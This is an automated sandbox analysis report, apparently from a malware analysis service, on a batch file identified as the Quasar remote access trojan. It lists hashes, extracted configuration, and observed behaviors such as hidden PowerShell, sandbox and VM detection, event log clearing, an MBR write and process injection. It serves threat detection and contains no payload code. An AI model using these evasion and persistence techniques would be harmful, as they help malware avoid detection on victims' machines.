Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-12-2024 00:45
Static task
static1
Behavioral task
behavioral1
Sample
skibiditoilet.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
skibiditoilet.bat
Resource
win10v2004-20241007-en
General
-
Target
skibiditoilet.bat
-
Size
7.4MB
-
MD5
e67e3a94d89425d40496ddf35898d535
-
SHA1
0797b9358d62864867ce3253a02a20456ac735b1
-
SHA256
8d7786fb33c1d05816fdc8c938273b452e94a4234358b45e567cc31ceaf262ad
-
SHA512
6b7c2115556e45e4584a6eb2cc8a68585b8ac25806135406057aa44c41aa9ae6a10fdaf4abdba2e2d94df526f90ed243a86664f82de044fb2603025d8965e13d
-
SSDEEP
49152:SckmM2hvv+vfCedsWawQhCU2p3byz6fH6DdztsVuY/FEXx3bSwbhK0XD2KiVmZbV:V
Malware Config
Extracted
quasar
-
encryption_key
BF83117B79367DC6A2463E499652930B1A20BE7A
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/3124-2433-0x00000208D81C0000-0x00000208D8944000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 3124 created 4888 3124 WerFault.exe 89 PID 4292 created 3124 4292 WerFault.exe 120 -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 4888 created 620 4888 powershell.exe 5 PID 2332 created 4888 2332 svchost.exe 89 PID 3124 created 620 3124 powershell.exe 5 PID 2332 created 3124 2332 svchost.exe 120 PID 2332 created 3124 2332 svchost.exe 120 -
Blocklisted process makes network request 2 IoCs
flow pid Process 34 3124 powershell.exe 36 3124 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4888 powershell.exe 3124 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 1 IoCs
pid Process 2972 sWGTMr.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\T: svchost.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe -
Drops file in System32 directory 14 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\$nya-lDg6cyMx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
pid Process 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4888 set thread context of 4860 4888 powershell.exe 93 PID 3124 set thread context of 3448 3124 powershell.exe 121 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN powershell.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\$nya-onimai2 powershell.exe File created C:\Windows\$nya-onimai2\sWGTMr.exe powershell.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\$rbx-onimai2 powershell.exe File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat cmd.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 28 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00F776B702D" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018C00F776B702D = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8c5ae66c44e0548aebe78fbbf17ad2100000000020000000000106600000001000020000000254632aceed3a71a7e23164fec87019cea551f7f8eb890a0afd5ed71022876e3000000000e8000000002000020000000bbf5224dc3042c43d8a30307ba737304f3fdf4c745fb737527ec931017444f5a800000000bae8911783f93fdd6ef64e4c6dc17a75820bd0c7a3af56a2af7208b6104879e80cab30f6771413635f8d6334509d5c42b022099f3c09a49a3efc6a395179e5096e757e6e7b9712e8177eac2545a1c8dcd992afd50d0e48c62aee720bafb1d7847780cce6f199ffcb55ceff8f6564162017956758d3034d1f78165ce1018f46540000000e3d0b8835eec3d735f333180d0899ec38e3226cfa43dd2bfa6cb906ec3cca29f339c3bd09cd288bc0849fb8e390730aad104e9100d9e16e898530dea1252a296 mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1734310035" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018C00F776B702D" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 16 Dec 2024 00:47:17 GMT" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8c5ae66c44e0548aebe78fbbf17ad2100000000020000000000106600000001000020000000654288e30750b05f32ac33ab639b980aa57ee087f24e1106c6ff270445efa4b1000000000e80000000020000200000002abc8b761ab8745b67a5de5bfaa48440402afd04e0f9c8c1616e524b02d84b17b0030000d35ec8d674ad585f559a6c049f764d7af1ac2b7a9c77952323ca694c2d75dd2d6c1f352a2593b927333c03b155ef3287abdecbcb435f656b6e2da059423faf1de22b25f684f6f85a9c82fb7a257450fe444204e7f90a341cd2537107b42e90bc0dc5375b447594ee4c4580c555b884e84603edc7cfa9d59b7b899177f501a6464b0e0c778f3efa0553b65f516a0f503ad9ed09d52089f7a3a7ccb049e1af060401f293164d30e6871a50d437dfde582252c8b180c7c45e1ad3b4cff747969046e0951cd45de0e6cd785a28afdacded340a56304568774fac7ee7ca856410e1fd38fbd12683efa7bd902d65a8822f7d99dd2517276f75d70bcd180dbd3c6f7d93e06af6819824d378f87d0a6f8433a668526a7c3246ca33dde7faa5cac1ac108bf4633c435c9fe7eafef82ebf533cf62f9f999e269ffd7c14f64f9ee08e2f126bbf68cf332d7deda4a3aad1840d3323f8b76058e67e0fe99ff3dedaaa0c21d7c523525443afa241cf8d6b37ad03d72b73ca8a71dfb6616879bcfd4891740042ba49980f1cdc49a53c4ac47c1f76da1cf4d49fbbf10e10dc368ae002e81a4cf1442057c9221a264d2a673495df6ec28936eae65f2fcb071ce34f02ba8a24aefb5a8f5c4ff887287e50858ccf9c48aacc20680f9d2f7007434e0bdc8130da3d95a118d6a9b0d33b15dac7fff4e8ea9d4a4461275abc11fc1e4fb26cd23fe35b8bd1059dac6d81b172ab43141d15b04f71ef64068159ee5d960db208bae112137332b1410dce341c8e687c5aea788832f7de0a35e3bfe0ab649645a2e9eb941ea790b1a41f379e4a5cfcbc35d2bd5ef910e4bc744a36b25b844341db5fd4c5a84047aa14d9c8e7ed101e68cf2e0fd8877f3cbd8e08e4fced85729f45b0cb7044715f4114c2424bf0e552617b68bbbca12da3d32c432411e7f7a7239a9ae88405e4e5e51f3325fba5726472ec96a1ff51adb8dfa5f5a3adbb82efcdf4b524ee3efbea4e049519199c3fc881381a7c3c758654c935936107eae81e1efbf1f40d347fb488f3ed1a196130c186fb2c94d3b17bc7f88f28a913db4132dc833cafa8cb6c53827076f17fcd3eeae00e9afef25c0d95c11bebc50426f903e729c9ec9ffb42ae4b66c1d2c199122b668f0f696a13bb2370f044beb9e2ae3f074a3274e7082c47afcc8fd417d6bf0c082bacf2f6045773f1d2c0deb2f65665d8ec07b3625b25d2a943e9f7bde97b4314324d40401c2f16c0f097d64e9de37e043850f1141739eabed94aea2f388ec5fcbcce3e7f62f30479fd238a72a96352ee9895fb3e93ebe83cb3d4b079bdbac0e5bdad09914eaa05400000009bddedad72d237fe7652d98b8003bf2a3d1efbc685d5bf9247f43684e43b01ff727d7c39dbc278a7617061876a190dcaaf4ecdd168dce166453975aabc3130cc mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={8EDDE341-6043-44F9-8E11-D9E3F6A00C16}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4888 powershell.exe 4888 powershell.exe 4888 powershell.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe 4860 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3484 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4888 powershell.exe Token: SeDebugPrivilege 4860 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 1940 svchost.exe Token: SeIncreaseQuotaPrivilege 1940 svchost.exe Token: SeSecurityPrivilege 1940 svchost.exe Token: SeTakeOwnershipPrivilege 1940 svchost.exe Token: SeLoadDriverPrivilege 1940 svchost.exe Token: SeSystemtimePrivilege 1940 svchost.exe Token: SeBackupPrivilege 1940 svchost.exe Token: SeRestorePrivilege 1940 svchost.exe Token: SeShutdownPrivilege 1940 svchost.exe Token: SeSystemEnvironmentPrivilege 1940 svchost.exe Token: SeUndockPrivilege 1940 svchost.exe Token: SeManageVolumePrivilege 1940 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1940 svchost.exe Token: SeIncreaseQuotaPrivilege 1940 svchost.exe Token: SeSecurityPrivilege 1940 svchost.exe Token: SeTakeOwnershipPrivilege 1940 svchost.exe Token: SeLoadDriverPrivilege 1940 svchost.exe Token: SeSystemtimePrivilege 1940 svchost.exe Token: SeBackupPrivilege 1940 svchost.exe Token: SeRestorePrivilege 1940 svchost.exe Token: SeShutdownPrivilege 1940 svchost.exe Token: SeSystemEnvironmentPrivilege 1940 svchost.exe Token: SeUndockPrivilege 1940 svchost.exe Token: SeManageVolumePrivilege 1940 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1940 svchost.exe Token: SeIncreaseQuotaPrivilege 1940 svchost.exe Token: SeSecurityPrivilege 1940 svchost.exe Token: SeTakeOwnershipPrivilege 1940 svchost.exe Token: SeLoadDriverPrivilege 1940 svchost.exe Token: SeSystemtimePrivilege 1940 svchost.exe Token: SeBackupPrivilege 1940 svchost.exe Token: SeRestorePrivilege 1940 svchost.exe Token: SeShutdownPrivilege 1940 svchost.exe Token: SeSystemEnvironmentPrivilege 1940 svchost.exe Token: SeUndockPrivilege 1940 svchost.exe Token: SeManageVolumePrivilege 1940 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1940 svchost.exe Token: SeIncreaseQuotaPrivilege 1940 svchost.exe Token: SeSecurityPrivilege 1940 svchost.exe Token: SeTakeOwnershipPrivilege 1940 svchost.exe Token: SeLoadDriverPrivilege 1940 svchost.exe Token: SeSystemtimePrivilege 1940 svchost.exe Token: SeBackupPrivilege 1940 svchost.exe Token: SeRestorePrivilege 1940 svchost.exe Token: SeShutdownPrivilege 1940 svchost.exe Token: SeSystemEnvironmentPrivilege 1940 svchost.exe Token: SeUndockPrivilege 1940 svchost.exe Token: SeManageVolumePrivilege 1940 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1940 svchost.exe Token: SeIncreaseQuotaPrivilege 1940 svchost.exe Token: SeSecurityPrivilege 1940 svchost.exe Token: SeTakeOwnershipPrivilege 1940 svchost.exe Token: SeLoadDriverPrivilege 1940 svchost.exe Token: SeSystemtimePrivilege 1940 svchost.exe Token: SeBackupPrivilege 1940 svchost.exe Token: SeRestorePrivilege 1940 svchost.exe Token: SeShutdownPrivilege 1940 svchost.exe Token: SeSystemEnvironmentPrivilege 1940 svchost.exe Token: SeUndockPrivilege 1940 svchost.exe Token: SeManageVolumePrivilege 1940 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1940 svchost.exe Token: SeIncreaseQuotaPrivilege 1940 svchost.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 3484 Explorer.EXE 3484 Explorer.EXE 3484 Explorer.EXE 3484 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3124 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1876 wrote to memory of 516 1876 cmd.exe 84 PID 1876 wrote to memory of 516 1876 cmd.exe 84 PID 1876 wrote to memory of 2588 1876 cmd.exe 85 PID 1876 wrote to memory of 2588 1876 cmd.exe 85 PID 1876 wrote to memory of 3448 1876 cmd.exe 86 PID 1876 wrote to memory of 3448 1876 cmd.exe 86 PID 1876 wrote to memory of 3452 1876 cmd.exe 87 PID 1876 wrote to memory of 3452 1876 cmd.exe 87 PID 1876 wrote to memory of 4056 1876 cmd.exe 88 PID 1876 wrote to memory of 4056 1876 cmd.exe 88 PID 1876 wrote to memory of 4888 1876 cmd.exe 89 PID 1876 wrote to memory of 4888 1876 cmd.exe 89 PID 4888 wrote to memory of 4860 4888 powershell.exe 93 PID 4888 wrote to memory of 4860 4888 powershell.exe 93 PID 4888 wrote to memory of 4860 4888 powershell.exe 93 PID 4888 wrote to memory of 4860 4888 powershell.exe 93 PID 4888 wrote to memory of 4860 4888 powershell.exe 93 PID 4888 wrote to memory of 4860 4888 powershell.exe 93 PID 4888 wrote to memory of 4860 4888 powershell.exe 93 PID 4888 wrote to memory of 4860 4888 powershell.exe 93 PID 4860 wrote to memory of 620 4860 dllhost.exe 5 PID 4860 wrote to memory of 672 4860 dllhost.exe 7 PID 4860 wrote to memory of 940 4860 dllhost.exe 12 PID 4860 